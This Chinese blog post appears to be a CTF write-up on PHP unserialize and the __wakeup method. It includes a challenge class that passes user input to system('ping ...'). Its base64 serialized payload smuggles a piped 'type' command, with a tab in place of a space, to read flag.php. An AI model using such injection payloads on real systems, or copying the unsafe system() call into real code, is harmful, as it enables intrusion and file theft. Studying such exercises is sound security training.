反序列化__wakeup

最新推荐文章于 2024-01-24 09:21:44 发布
最新推荐文章于 2024-01-24 09:21:44 发布
阅读量310 收藏
点赞数
分类专栏: CTF web安全 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyj1781572/article/details/128199230
版权

  1. 简介                  

__wakeup(),执行unserialize()时,先会调用这个函数。     

<?php
class c1
{
    private $argv;
    private $method;

    function __construct($argv,$method)
    {
        $this->argv=$argv;
        $this->method=$method;

    }

    public function f1()
    {
        echo "f1";
    }


    function __wakeup()
    {

        $this->f1();

    }


}

$c1= new c1('123','GET');
$b = serialize($c1);
echo $b;
$str= $_GET['str'];
unserialize($str);

 2.CTF考题

index.php 读取目录flag.php

<?php
class home{

    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }

    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    }

    function ping($host){
        system("ping -c 2 $host");
    }
    function waf($str){
        $str=str_replace(' ','',$str);
        return $str;
    }

    function __wakeup(){
        foreach($this->args as $k => $v) {
           $this->args[$k] = $this->waf(trim(addslashes($v)));
 
        }
    }
}
$a=@$_GET['a'];

unserialize(base64_decode($a));

解题思路    

unserialize 反序列化的时候会优先调用__wakeup() 进行空格过滤 $this->waf 调用waf函数把空格过滤是空。     

首先构造序列化 base64    

Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGhvbWUAYXJncyI7YToxOntpOjA7czo2NzoiMTI3LjAuMC4xfHR5cGUJRDpccGhwc3R1ZHlfcHJvXFdXV1x3d3cudGVzdDEuY29tXGN0ZlxkZW1vNVxmbGFnLnBocCI7fX0=

 

jack-yyj
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
__wakeup绕过版本_PHP__wakeup()方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 1114
​ __wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。只要序列化的中的成员数大于实际成员数,即可绕过
php __destruct反序列化原理
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-30 744
序列化就是将数据转化成一种可逆的字符串,字符串还原原来结构的过程叫做反序列化。__destruct 当一个对象销毁时被调用, __toString 当一个对象被当作一个字符串被调用。 __wakeup() 使用unserialize时触发 __sleep() 使用serialize时触发 __destruct() 对象被销毁时触发...
[极客大挑战 2019]PHP (简单的php反序列化和__wakeup绕过)
xlcvv的博客
04-05 926
这群师傅,不仅懂得D站,html也写的很棒,超喜欢这里的,人长的又帅,说话又好听······ 进入正题,提示备份了网站,那就是WWW.zip了,下载下来: 浏览了一遍,主要在class.php里面: <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; ...
反序列化中_wakeup的绕过
rev1ve的博客
09-05 1921
反序列化中_wakeup扮演着非常重要的角色,ctf碰到很多的题目都有涉及到_wakeup绕过,写下这篇博客来总结下大部分绕过方法,其中会有例题具体演示。
魔术方法__sleep和__wakeup、序列与反序列
LSGOZJ的博客
03-15 1242
串行化serialize可以把变量包括对象,转化成连续bytes数据. 你可以将串行化后的变量存在一个文件里或在网络上传输. 然后再反串行化还原为原来的数据. 你在反串行化类的对象之前定义的类,PHP可以成功地存储其对象的属性和方法. 有时你可能需要一个对象在反串行化后立即执行. 为了这样的目的,PHP会自动寻找__sleep和__wakeup方法.当一个对象被串行化,PHP会调用__sleep方法
反序列化__wakeup()绕过
最新发布
csjjjd的博客
01-24 702
这里因为flag在flag.php但是我只要进行反序列化就会触发wake()魔术方法,使file=index.php,这不是我们要的,所以必须绕过它,这里直接复制前面代码,把file改为flag.php,进行反序列化,得到正常的pop链,之后再把。后面的数字加个正号,然后把属性加一,接下来URL编码就可以绕过。但是限制很大,5
PHP反序列化-__wakeup()方法漏洞(CVE-2016-7124)
bin789456的博客
08-13 3756
写在前面 wakeup()是在反序列化的基础之上进行的,如果你不是很清楚反序列化漏洞,可以点击下方: [超链接] 漏洞影响的版本 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞利用方法 若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法进行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 漏洞出现情况 1.可以之间或简介控制序列化结果 2.__wakeup(
mysql序列化字段反序列化_序列化serialize()与反序列化unserialize()的实例
weixin_32495691的博客
02-08 3021
在写序列化serialize与反序列化unserialize()时,我们先来看看:serialize — 产生一个可存储的值的表示描述string serialize ( mixed $value )serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。这有利于存储或传递 PHP 的值,同时不丢失其类型和结构。想要将已序列化的字符串变回 PHP 的值,可...
028-精通PHP序列化与反序列化之_道_.pdf
09-20
- __wakeup():当使用unserialize()反序列化对象时自动调用。 - __toString():当对象被当作字符串使用时自动调用。 - __isset():当对不可访问属性使用isset()或empty()时自动调用。 - __unset():当对不可访问属性...
mysql 反序列化函数_phar反序列化
weixin_42529544的博客
01-21 1019
phar反序列化前段时间纵横杯遇到一题反序列化,当时队友做出来了,赛后尝试复现一下,并总结反序列化内容phar的本质是一种压缩文件,会以序列化的形式存储用户自定义的meta-dataPhar文件结构stub:phar文件标识,以 __HALT_COMPILER();?>结尾manifest:压缩文件的属性等信息,以序列化的形式存储自定义的meta-datacontents:压缩文件的内容si...
序列化,反序列化技术,__sleep __wakeup __tostring __invoke()
qq_37171379的博客
02-12 1169
含义: 序列化: 就是将一个变量所代表的“内存”数据,转换为“字符串”形式并持久保存在硬盘上的一种做法。 反序列化: 就是将序列化之后保存在硬盘上的“字符串数据”,恢复为其原来的内存形式的变量数据的一种做法。 序列化的做法: $v1 = 123; //这是一个变量,代表任意的内存数据 $s1 = serialize( $v1 ); //将任何类型的变量数据,转换为“字符串” file_put...
PHP序列化与反序列化(__sleep与__wakeup
1stPeak's Blog
04-02 2781
前言 总结一下序列化和反序列化的知识 介绍 1、序列化 将一个对象转换为字符串 2、反序列化 将一个字符串恢复成对象 PHP序列化 php序列化的函数为serialize() 例: <?php class peak{ public $name = "1stPeak"; protected $sex = "man"; private $age = "18"; } $a = new pe...
XCTF-攻防世界CTF平台-Web类——10、unserialize3(反序列化漏洞绕过__wakeup()函数)
Onlyone_1314的博客
11-21 2472
打开题目地址: 发现是一段残缺的php代码 题目名称unserialize3就是反序列化,要求我们通过反序列化漏洞绕过__wakeup()函数。 相关概念: 序列化:   序列化(Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 php的序列化和反序列化   php的序列化和反序列化由serialize()和unserialize()这两个函数来完成。s
序列化(serialize)和反序列化(unserialize)以及__sleep()函数和__wakeup()函数
sb___itfk的专栏
08-25 1744
序列化数据就是将数据转化成一个
PHP反序列化
她叫常玉莹
08-19 183
所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字。 为了能够unserialize()一个对象,这个对象的类必须已经定义过。如果序列化类A的一个对象,将会返回一个跟类A相关,而且包含了对象所有变量值的字符串。 如果要想在另外一个文件中解序列化一个对象,这个对象的类必须在解序列化之前定义,可以通过包含一个定义该类的文件或使用
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6329
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
php代码审计15.1之反序列化
划水的小白白
07-12 504
1、常见魔术方法 1.1、序列化的__sleep 1.2、反序列化的__wakeup 1.3、其他常见魔术方法 2、 访问控制修饰符 2.1、基本知识 2.2、存在非public属性时的反序列化 3、造成漏洞的前提 4、常见的魔术方法 5、漏洞复现 5.0、pop链的含义 5.1、CVE-2016-7124(绕过__wakeup) 5.2、常规利用(__destruct函数) 5.3、__toString漏洞示例 5.4、无pop利用链且echo反序列化 5.4.1、php7版本, 5.4.2、php5版本
php up,PHP中 __wakeup()方法详解
weixin_36033929的博客
03-12 1048
__wakeup(),执行unserialize()时,先会调用这个函数如果说 __sleep() 是白的,那么 __wakeup() 就是黑的了。那么为什么呢?因为:与之相反,`unserialize()` 会检查是否存在一个 `__wakeup()` 方法。如果存在,则会先调用 `__wakeup` 方法,预先准备对象需要的资源。作用:__wakeup() 经常用在反序列化操作中,例如重新建立...
__wakeup()函数失效引发漏洞(CVE-2016-7124)
Bendawang's Blog
10-22 6833
CVE-2016-7124
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jack-yyj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值